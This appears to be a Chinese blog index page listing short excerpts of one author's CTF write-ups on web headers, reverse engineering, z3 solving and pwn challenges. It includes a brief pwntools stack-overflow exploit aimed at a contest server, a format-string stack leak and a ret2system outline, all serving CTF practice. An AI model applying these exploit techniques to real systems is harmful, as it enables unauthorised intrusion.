上一页 1 ··· 4 5 6 7 8 9 10 11 12 下一页
摘要: 学了xff和referer X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服 阅读全文
posted @ 2022-04-10 16:31 REPWNER 阅读(6) 评论(0) 推荐(0)
摘要: 首先装了两个东西,一个是burpsuite,一个是proxy插件。 先用bp抓包。这里要用proxy截断,再bp抓包。 抓包(packet capture)就是将网络传输发送与接收的数据包进行截获、重发、编辑、转存等操作,也用来检查网络安全。抓包也经常被用来进行数据截取等。 到target这里找到对 阅读全文
posted @ 2022-04-10 02:45 REPWNER 阅读(1) 评论(0) 推荐(0)
摘要: 这个题是一道花指令,也是我见到的第一个花指令。 花指令的主要意思就是为了保护代码不轻易的被反汇编,任何故意构造一个恶意代码,导致反汇编失败。其中有很多种花指令,这里是最简单的。 这里看到这个红色的东西。可以分析出来这里是一个死循环。而且也可以知道,这就是出题人故意干的 按快捷键D把call改成数据。 阅读全文
posted @ 2022-04-09 20:53 REPWNER 阅读(0) 评论(0) 推荐(0)
摘要: 学习了http的两种上传方式,一个是got上传,一个是post上传 在这道题里面就是可以用hackbar去进行两种传递 阅读全文
posted @ 2022-04-09 14:16 REPWNER 阅读(1) 评论(0) 推荐(0)
摘要: 很简单,自定义base64 表和密文都有在线解密就好了 阅读全文
posted @ 2022-03-31 13:07 REPWNER 阅读(6) 评论(0) 推荐(0)
摘要: 离谱题 就是解这个方程 教你用python函数库z3,可以解这个方程 指令为pip install z3-solver 脚本是抄得 from z3 import * s = Solver() v1 = Int('v1') v2 = Int('v2') v3 = Int('v3') v4 = Int( 阅读全文
posted @ 2022-03-31 00:58 REPWNER 阅读(1) 评论(0) 推荐(0)
摘要: 这道题给了exe然后是python逆向,因为只有py文件我们才可以读的懂的源码,我的思路就是把exe变成pyc文件再在线改成py。 https://www.jb51.net/article/231188.htm 附上得到pyc文件的链接 https://github.com/countercept/ 阅读全文
posted @ 2022-03-30 21:51 REPWNER 阅读(10) 评论(0) 推荐(0)
摘要: 格式化字符串输出漏洞,原理就是当printf(%p),这么用时,没有参数,就会输出栈上的东西,这次flag在栈上,然后在终端里输入%10$ %11$p 等等就可以得到16进制,转字符串就对了,10 11等等是在栈上的偏移量。 阅读全文
posted @ 2022-03-30 21:36 REPWNER 阅读(5) 评论(0) 推荐(0)
摘要: 简单栈溢出 from pwn import * io=remote('121.40.181.50',10001) payload="a"*24+ p64(0x4005f6) io.sendline(payload) io.interactive() 阅读全文
posted @ 2022-03-30 21:29 REPWNER 阅读(5) 评论(0) 推荐(0)
摘要: PWN题真的恶心。这里面给了system函数,但是字符串是date,没有/bin/sh,所以需要手动输入。 这里第一个输入就把/bin/sh输入进去 地址在这里。然后去找gadget, **x64要执行system("/bin/sh")的常见方法就是把rdi寄存器赋为"/bin/sh"的地址 然后调 阅读全文
posted @ 2022-03-30 21:24 REPWNER 阅读(4) 评论(0) 推荐(0)
上一页 1 ··· 4 5 6 7 8 9 10 11 12 下一页